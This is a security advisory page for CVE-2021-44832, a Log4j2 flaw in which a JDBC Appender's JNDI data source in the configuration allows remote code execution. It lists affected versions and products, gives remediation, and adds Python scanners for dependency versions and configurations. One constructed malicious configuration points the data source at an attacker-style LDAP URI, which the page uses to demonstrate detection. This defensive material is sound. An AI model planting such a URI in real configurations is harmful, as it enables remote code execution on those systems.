CVE-2021-44832: Apache Log4j2 remote code execution via a JDBC Appender JNDI data source URI

Published Dec 12, 2021

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) allow an attacker with permission to modify the logging configuration file to execute arbitrary code: a malicious configuration can declare a JDBC Appender whose data source references a JNDI URI (for example an LDAP server the attacker controls), and log4j-core will resolve that URI when the appender is initialised. The fix in 2.17.1, 2.12.4 and 2.3.2 limits JNDI data source names to the java protocol. This is a different issue from CVE-2021-44228 (Log4Shell), which concerned JNDI lookups triggered by attacker-controlled log message content and parameters and was fixed in earlier releases; CVE-2021-44832 requires control of the configuration, not of logged data.

Other sources

Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.

IBM

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.


Affected packages: only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. If org.apache.logging.log4j:log4j-api is in use, it should be kept at the same version as log4j-core to ensure compatibility.

This issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited.

GitHub

Affected Software

71 affected components (fixes available)

redhat/eap7-log4j <0:2.17.1-1.redhat_00001.1.el8ea, fixed in 0:2.17.1-1.redhat_00001.1.el8ea
redhat/eap7-log4j <0:2.17.1-1.redhat_00001.1.el7ea, fixed in 0:2.17.1-1.redhat_00001.1.el7ea
redhat/log4j <2.17.1, fixed in 2.17.1
redhat/log4j <2.12.4, fixed in 2.12.4
redhat/log4j <2.3.2, fixed in 2.3.2
Apache Log4j=2.0-beta9
Apache Log4j=2.15.0
Apache Log4j=2.17.0
Apache Log4j=1.2.x
Apache Log4j>=2.0.1<2.3.2
Apache Log4j>=2.4<2.12.4
Apache Log4j>=2.13.0<2.17.1
Apache Log4j=2.0
Apache Log4j=2.0-beta7
Apache Log4j=2.0-beta8
Apache Log4j=2.0-rc1
Apache Log4j=2.0-rc2
Oracle Communications Diameter Signaling Router>=8.0.0.0<=8.5.1.0
Oracle Communications Interactive Session Recorder=6.3
Oracle Communications Interactive Session Recorder=6.4
Oracle Primavera Gateway>=17.12.0<=17.12.11
Oracle Primavera Gateway>=18.8.0<=18.8.13
Oracle Primavera Gateway>=19.12.0<=19.12.12
Oracle Primavera Gateway>=20.12.0<=20.12.7
Oracle Primavera Gateway=21.12.0
Oracle Primavera P6 Enterprise Project Portfolio Management>=19.12.0<=19.12.18.0
Oracle Primavera P6 Enterprise Project Portfolio Management>=20.12.0.0<=20.12.12.0
Oracle Primavera P6 Enterprise Project Portfolio Management=21.12.0.0
Oracle Primavera Unifier=18.8
Oracle Primavera Unifier=19.12
Oracle Primavera Unifier=20.12
Oracle Primavera Unifier=21.12
Oracle Retail Assortment Planning=16.0.3
Oracle Retail Fiscal Management=14.2
Oracle Siebel UI Framework=21.12
Oracle WebLogic Server=12.2.1.3.0
Oracle WebLogic Server=12.2.1.4.0
Oracle WebLogic Server=14.1.1.0.0
Cisco Cloudcenter=4.10.0.16
Fedoraproject Fedora=34
Fedoraproject Fedora=35
Debian Debian Linux=9.0
Oracle Communications Brm - Elastic Charging Engine<12.0.0.4.6
Oracle Communications Brm - Elastic Charging Engine=12.0.0.5.0
Oracle Communications Diameter Signaling Router>=8.3.0.0<=8.5.1.0
Oracle Communications Offline Mediation Controller<12.0.0.4.4
Oracle Communications Offline Mediation Controller=12.0.0.5.0
Oracle FLEXCUBE Private Banking=12.1.0
Oracle Health Sciences Data Management Workbench=2.5.2.1
Oracle Health Sciences Data Management Workbench=3.0.0.0
Oracle Health Sciences Data Management Workbench=3.1.0.3
Oracle Policy Automation>=12.2.0<=12.2.24
Oracle Policy Automation For Mobile Devices>=12.2.0<=12.2.24
Oracle Primavera P6 Enterprise Project Portfolio Management>=19.12.0.0<=19.12.18.0
Oracle Product Lifecycle Analytics=3.6.1
Oracle Retail Order Broker=18.0
Oracle Retail Order Broker=19.1
Oracle Retail Xstore Point of Service=17.0.4
Oracle Retail Xstore Point of Service=18.0.3
Oracle Retail Xstore Point of Service=19.0.2
Oracle Retail Xstore Point of Service=20.0.1
Oracle Retail Xstore Point of Service=21.0.1
Oracle Siebel UI Framework<=21.12
maven/org.ops4j.pax.logging:pax-logging-log4j2 >=2.0.0 <2.0.14, fixed in 2.0.14
maven/org.ops4j.pax.logging:pax-logging-log4j2 >=1.11.0 <1.11.13, fixed in 1.11.13
maven/org.ops4j.pax.logging:pax-logging-log4j2 >=1.10.0 <1.10.9, fixed in 1.10.9
maven/org.ops4j.pax.logging:pax-logging-log4j2 >=1.8.0 <1.9.2, fixed in 1.9.2
maven/org.apache.logging.log4j:log4j-core >=2.13.0 <2.17.1, fixed in 2.17.1
maven/org.apache.logging.log4j:log4j-core >=2.4 <2.12.4, fixed in 2.12.4
maven/org.apache.logging.log4j:log4j-core >=2.0-beta7 <2.3.2, fixed in 2.3.2
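The three log4j-core ranges above are awkward to check by eye because the fixed releases 2.3.2 and 2.12.4 sit inside the 2.0-beta7 to 2.17.0 span and because Log4j2 pre-release versions (2.0-beta7, 2.0-rc1) do not sort numerically. The following is an added example, not code from this advisory or the Log4j project: it encodes the page's ranges, orders versions the way Maven does (beta before rc before final), and scans constructed `mvn dependency:list` style lines for affected log4j-core coordinates. The sample lines and their versions are made up for the illustration.

```python
import re
from typing import List, Optional, Tuple

# Affected ranges for org.apache.logging.log4j:log4j-core as listed on this page:
# (first affected version inclusive, first fixed version exclusive, fix version).
AFFECTED_RANGES: List[Tuple[str, str, str]] = [
    ("2.0-beta7", "2.3.2", "2.3.2"),    # Java 6 line
    ("2.4", "2.12.4", "2.12.4"),        # Java 7 line
    ("2.13.0", "2.17.1", "2.17.1"),     # Java 8+ line
]

# Pre-release qualifiers in the order Maven sorts them; a final release sorts last.
_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_RANK = 9


def version_key(version: str) -> Tuple[int, ...]:
    """Comparable key for Log4j2 version strings such as 2.0-beta7, 2.0-rc1, 2.0, 2.17.1.

    Ordering: 2.0-beta7 < 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1 < 2.17.1
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:-([A-Za-z]+)(\d*))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    numbers = tuple(int(part) for part in m.group(1).split("."))
    numbers += (0,) * (3 - len(numbers))          # 2.4 compares like 2.4.0
    if m.group(2):
        rank = _QUALIFIER_RANK.get(m.group(2).lower(), 0)
        qualifier_number = int(m.group(3) or 0)
    else:
        rank, qualifier_number = _FINAL_RANK, 0
    return numbers + (rank, qualifier_number)


def fix_version_for(version: str) -> Optional[str]:
    """Return the fix version if this log4j-core version is affected, otherwise None."""
    key = version_key(version)
    for first_affected, first_fixed, fix in AFFECTED_RANGES:
        if version_key(first_affected) <= key < version_key(first_fixed):
            return fix
    return None


# Maven coordinates as printed by `mvn dependency:list` or `mvn dependency:tree`.
_LOG4J_CORE = re.compile(r"org\.apache\.logging\.log4j:log4j-core:(?:jar:)?([\w.\-]+)")


def scan_dependency_output(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (version, fix_version) for every affected log4j-core coordinate in the lines.

    log4j-api lines are ignored: only log4j-core carries the vulnerable code.
    """
    findings = []
    for line in lines:
        m = _LOG4J_CORE.search(line)
        if m:
            fix = fix_version_for(m.group(1))
            if fix:
                findings.append((m.group(1), fix))
    return findings


# Constructed sample output (not from a real build); three versions of log4j-core are
# listed only so that one scan exercises an affected, a fixed and a pre-release version.
SAMPLE_DEPENDENCY_OUTPUT = [
    "[INFO]    org.apache.logging.log4j:log4j-api:jar:2.17.0:compile",
    "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.17.0:compile",
    "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.12.4:runtime",
    "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.0-beta9:test",
]

if __name__ == "__main__":
    for version, fix in scan_dependency_output(SAMPLE_DEPENDENCY_OUTPUT):
        print(f"log4j-core {version} is affected by CVE-2021-44832; upgrade to {fix}")
```

Shaded or repackaged copies of log4j-core (for example the pax-logging-log4j2 artifacts listed above) will not match the coordinate regex and need their own mapping from wrapper version to bundled log4j-core version.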

Remediation

Information

Upgrade log4j-core to 2.17.1 (Java 8 and later), 2.12.4 (Java 7) or 2.3.2 (Java 6). As per upstream:
- In prior releases, confirm that if the JDBC Appender is being used it is not configured to use any protocol other than java.
- Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
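The upstream check above, and the configuration-controlled attack the vulnerability descriptions earlier on this page describe, are easiest to see on a concrete configuration. The following is an added example, not code from the Log4j project or this advisory. It contains two constructed log4j2.xml documents (the first follows the documented JDBC appender layout with a DataSource jndiName; the second substitutes a hypothetical attacker-controlled LDAP URI, with attacker.example a made-up host) and a small scanner that flags DataSource jndiName values whose scheme is not java. Two audit rules are this example's own choice rather than a statement of the project's exact check: scheme-less names are accepted as local InitialContext names, and names built from ${...} lookups are flagged because they cannot be judged statically. The scanner handles XML configuration only; properties, JSON and YAML configurations carry the same attribute in their own syntax.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from typing import List, Tuple

# Constructed Log4j2 configuration for this example, laid out like the documented
# JDBC appender: the DataSource element names a JNDI resource by jndiName.
SAFE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <JDBC name="db" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
      <Column name="message" pattern="%message"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="error"><AppenderRef ref="db"/></Root>
  </Loggers>
</Configuration>
"""

# The weak form this advisory describes: the same appender, but the data source points at
# a JNDI URI on a hypothetical attacker-controlled LDAP server (constructed, not real).
MALICIOUS_CONFIG = SAFE_CONFIG.replace(
    "java:comp/env/jdbc/LoggingDataSource",
    "ldap://attacker.example:1389/o=payload",
)


def datasource_jndi_names(config_xml: str) -> List[str]:
    """Return every DataSource jndiName declared under a JDBC appender.

    Log4j2 matches element and attribute names case-insensitively, so tags and
    attribute names are compared lower-cased.
    """
    root = ET.fromstring(config_xml)
    names = []
    for element in root.iter():
        if element.tag.lower() != "jdbc":
            continue
        for child in element:
            if child.tag.lower() != "datasource":
                continue
            for attr, value in child.attrib.items():
                if attr.lower() == "jndiname":
                    names.append(value)
    return names


def is_java_jndi_name(name: str) -> bool:
    """Audit rule of this example: accept a 'java' scheme (java:comp/env/...) or no scheme
    at all (a plain name resolved in the local InitialContext); reject anything else,
    which is what restricting data source names to the java protocol amounts to."""
    scheme = urlsplit(name).scheme.lower()
    return scheme in ("", "java")


def audit_config(config_xml: str) -> List[Tuple[str, str]]:
    """Return (jndiName, reason) for each DataSource a pre-fix log4j-core would hand to
    an arbitrary JNDI provider, or whose value cannot be checked statically."""
    findings = []
    for name in datasource_jndi_names(config_xml):
        if "${" in name:
            # A lookup (env, sys, ...) is resolved at runtime; the static value is unknown.
            findings.append((name, "jndiName built from a lookup; cannot be verified statically"))
        elif not is_java_jndi_name(name):
            findings.append((name, f"non-java JNDI scheme '{urlsplit(name).scheme}'"))
    return findings


if __name__ == "__main__":
    for label, config in (("safe", SAFE_CONFIG), ("malicious", MALICIOUS_CONFIG)):
        print(label, audit_config(config) or "no findings")
```

Because the attacker in this CVE already has write access to the configuration, the scan is a detective control for configuration drift and for change review, not a substitute for upgrading log4j-core or for restricting who can write the configuration file.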

Event History

Dec 12, 2021
- Advisory published via FortiGuard, 12:00 AM
- Data sourced via FortiGuard, 12:00 AM (description, severity, weakness, affected software)

Dec 28, 2021
- CVE published, 12:00 AM
- CVE published via MITRE, 07:35 PM
- Data sourced via MITRE, 07:35 PM (description, weakness)
- Data sourced via Red Hat, 07:58 PM (description, severity, affected software)
- Data sourced via NVD, 08:15 PM (remedy, description, severity, weakness, affected software)

Jan 4, 2022
- Advisory published via GitHub, 04:14 PM

Feb 18, 2022
- Data sourced via IBM, 12:00 AM (description, severity, affected software)

Dec 10, 2023
- News published, 03:35 PM

Dec 11, 2023
- News published, 03:01 PM


Frequently Asked Questions

1. What is CVE-2021-44832?

CVE-2021-44832 is a vulnerability in Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) that allows remote code execution when an attacker who can modify the logging configuration declares a JDBC Appender whose data source references a JNDI URI the attacker controls.

2. How severe is CVE-2021-44832?

CVE-2021-44832 has a severity rating of medium (CVSS 6.6). It does not affect default configurations and requires control of the Log4j2 configuration, which lowers the likelihood of exploitation.

3. Which software versions of Apache Log4j2 are affected by CVE-2021-44832?

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are affected by CVE-2021-44832. Only log4j-core is affected; log4j-api on its own is not.

4. How can I fix CVE-2021-44832?

Upgrade log4j-core to 2.17.1, or to 2.12.4 or 2.3.2 on the older Java 7 and Java 6 lines. Until then, confirm that any JDBC Appender in use does not reference a data source with a protocol other than java.

5. What is the CWE category of CVE-2021-44832?

CVE-2021-44832 is classified under CWE-20 (Improper Input Validation).

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203